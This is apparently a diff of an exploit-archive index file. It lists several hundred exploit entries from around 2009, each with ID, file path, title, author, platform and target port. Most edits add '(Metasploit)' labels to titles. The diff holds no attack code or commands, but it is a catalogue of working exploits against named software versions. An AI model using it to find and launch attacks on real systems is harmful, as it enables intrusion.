9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BoF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - (.PLS) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Remote Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Remote Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 -9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 +9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (.ZIP) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Auth Bypass) Remote SQL Injection",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0 @@ -9189,12 +9189,12 @@ id,file,description,date,author,platform,type,port 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 +9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 -9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS",2009-11-10,zhangmc,windows,dos,21 +9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0 @@ -9239,7 +9239,7 @@ id,file,description,date,author,platform,type,port 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - (.m3u) Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 -9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow",2009-11-02,"Nikolas Sotiriu",windows,remote,0 +9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 @@ -9247,7 +9247,7 @@ id,file,description,date,author,platform,type,port 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hardcoded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 -9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection",2009-10-30,"H D Moore",unix,webapps,0 +9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9863,platforms/php/webapps/9863.txt,"Achievo <= 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 @@ -9266,7 +9266,7 @@ id,file,description,date,author,platform,type,port 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 -9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 +9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - XSS & Information Disclosure & Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 @@ -9285,52 +9285,52 @@ id,file,description,date,author,platform,type,port 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS & SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 -9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 +9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 -9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 -9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 -9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0 -9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 -9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25 -9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783 -9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632 -9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution",2009-02-25,patrick,multiple,webapps,0 -9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23 -9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23 -9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515 +9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 +9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 +9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 +9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 +9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 +9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 +9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 +9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 +9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 +9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 +9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 +9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 -9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139 -9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,anonymous,osx,remote,0 +9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 +9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload/Execute",2009-07-22,spinbad,php,webapps,0 -9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X)",2009-10-28,anonymous,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548 -9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 +9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) (Metasploit)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 +9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 -9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0 -9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139 -9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0 -9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0 -9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123 -9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0 -9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555 -9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0 -9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0 -9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0 -9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0 -9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0 -9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0 -9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 -9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 -9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 -9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 -9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 +9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 +9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 +9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 +9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 +9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,multiple,remote,0 +9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 +9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 +9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote,0 +9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite (Metasploit)",2007-03-05,egypt,multiple,remote,0 +9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",multiple,remote,0 +9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0 +9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0 +9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0 +9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0 +9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 +9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 +9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 +9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 @@ -9347,7 +9347,7 @@ id,file,description,date,author,platform,type,port 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 -33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80 +33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities",2009-11-16,"Alexey Sintsov",hardware,webapps,80 @@ -9387,25 +9387,25 @@ id,file,description,date,author,platform,type,port 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 -10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 +10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10022,platforms/linux/dos/10022.c,"Linux Kernel <= 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 -10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 -10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 -10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143 -10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080 -10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144 -10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80 +10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 +10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 +10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 +10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 +10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216 (Metasploit)",2006-03-08,MC,linux,remote,7144 +10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 -10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow",2004-07-18,onetwo,linux,remote,7787 -10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515 -10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49 -10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0 -10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0 +10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,cgi,webapps,443 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 +10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 +10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 +10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 +10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0 +10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,webapps,0 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 @@ -9430,7 +9430,7 @@ id,file,description,date,author,platform,type,port 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 -10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 +10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)",2009-11-12,"H D Moore",windows,dos,0 